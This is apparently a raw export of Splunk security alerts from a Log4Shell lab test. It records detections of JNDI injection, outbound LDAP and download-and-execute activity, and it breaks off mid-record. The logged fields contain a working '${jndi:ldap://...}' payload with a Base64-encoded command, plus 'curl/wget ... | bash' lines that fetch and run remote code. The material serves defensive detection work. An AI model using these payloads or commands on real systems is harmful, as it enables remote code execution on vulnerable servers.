risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642453, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="PR.DS", annotations._all="T1059", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="Source:Endpoint", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="Command and Control", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="PR.PT", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642451, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="CIS 5", annotations._all="CIS 16", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="CIS 3", annotations._all="T1190", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642453, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="PR.DS", annotations._all="T1059", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="Source:Endpoint", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="Command and Control", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="PR.PT", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642451, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="CIS 5", annotations._all="CIS 16", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="Source:Application Log", annotations._all="CIS 3", annotations._all="T1190", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell 